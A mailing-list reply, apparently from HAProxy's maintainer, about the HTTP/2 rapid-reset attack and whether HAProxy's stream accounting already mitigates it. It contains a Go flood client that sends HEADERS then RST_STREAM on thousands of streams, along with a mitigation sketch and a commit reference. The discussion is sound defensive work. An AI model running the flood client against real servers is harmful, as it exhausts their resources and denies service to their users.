On Tue, Oct 10, 2023 at 03:49:21PM +0200, Willy Tarreau wrote:
> > Seems like a clever update to the "good old" h2 multiplexing abuse vectors:
> > 1. client opens a lot of H2 streams on a connection
> > 2. spams some requests on them
> > 3. immediately sends H2 RST frames for all of them
> > 4. goes back to 1 and repeats
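
(Just to make that sequence concrete, a minimal abusive client could look
roughly like the untested Go sketch below, driving golang.org/x/net/http2's
raw framer over cleartext h2c. The target address and stream count are made
up, error handling is omitted, and a real abuser would also reconnect to
repeat step 4.)

  package main

  import (
      "bytes"
      "io"
      "log"
      "net"

      "golang.org/x/net/http2"
      "golang.org/x/net/http2/hpack"
  )

  func main() {
      // hypothetical local h2c ("prior knowledge") target
      conn, err := net.Dial("tcp", "127.0.0.1:8080")
      if err != nil {
          log.Fatal(err)
      }
      defer conn.Close()
      go io.Copy(io.Discard, conn) // drain whatever the server sends back

      // step 1: open the connection (client preface + empty SETTINGS)
      io.WriteString(conn, http2.ClientPreface)
      fr := http2.NewFramer(conn, conn)
      fr.WriteSettings()

      // encode a minimal GET request once and reuse the header block
      var hbuf bytes.Buffer
      enc := hpack.NewEncoder(&hbuf)
      enc.WriteField(hpack.HeaderField{Name: ":method", Value: "GET"})
      enc.WriteField(hpack.HeaderField{Name: ":scheme", Value: "http"})
      enc.WriteField(hpack.HeaderField{Name: ":authority", Value: "localhost"})
      enc.WriteField(hpack.HeaderField{Name: ":path", Value: "/"})

      // steps 2 and 3: HEADERS immediately followed by RST_STREAM(CANCEL)
      for sid := uint32(1); sid < 20000; sid += 2 { // client stream IDs are odd
          fr.WriteHeaders(http2.HeadersFrameParam{
              StreamID:      sid,
              BlockFragment: hbuf.Bytes(),
              EndStream:     true,
              EndHeaders:    true,
          })
          fr.WriteRSTStream(sid, http2.ErrCodeCancel)
      }
  }
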
> 
> Yes, that's precisely one of those I tested last week, among the usual
> approaches consisting in creating tons of streams while staying within
> the protocol's validity limits. The only thing it did was to detect the
> pool issue I mentioned in the dev7 announcement.
> 
> > The idea being to cause resource exhaustion on the server/proxy, at
> > least when it allocates stream-related buffers etc., and on the
> > underlying server too, since it likely sees the requests before they
> > get cancelled.
> > 
> > Looking at HAProxy, I'd like to know if someone's aware of a decent
> > mitigation option?
> 
> We first need to check whether we're affected at all, since we keep a
> count of the attached streams precisely for this case and refrain from
> processing HEADERS frames when we have too many streams, so normally
> the mux will pause, waiting for the upper layers to close them.
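
To illustrate the idea, that gating boils down to something like the
following (a very simplified Go sketch, not the actual mux code; the names
and numbers are made up):

  package main

  import "fmt"

  type h2Conn struct {
      attachedStreams int // streams not yet released by the upper layers
      maxConcurrent   int // e.g. the advertised SETTINGS_MAX_CONCURRENT_STREAMS
  }

  // mayAcceptHeaders reports whether the demux may process another
  // HEADERS frame; when it returns false the mux pauses and leaves the
  // frame in the buffer until the upper layers really close some streams.
  func (c *h2Conn) mayAcceptHeaders() bool {
      return c.attachedStreams < c.maxConcurrent
  }

  func main() {
      c := &h2Conn{attachedStreams: 100, maxConcurrent: 100}
      // The client may already have sent RST_STREAM for all 100 streams,
      // but until the application side detaches them no new HEADERS frame
      // is processed, which bounds the churn described above.
      fmt.Println(c.mayAcceptHeaders()) // false
  }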

So at first glance we indeed addressed this case in 2018 (1.9-dev)
with this commit:

  f210191dc ("BUG/MEDIUM: h2: don't accept new streams if conn_streams are 
still in excess")

It was incomplete back then and later refined, but the idea is there.
I'll try to stress that area again to see.

Willy
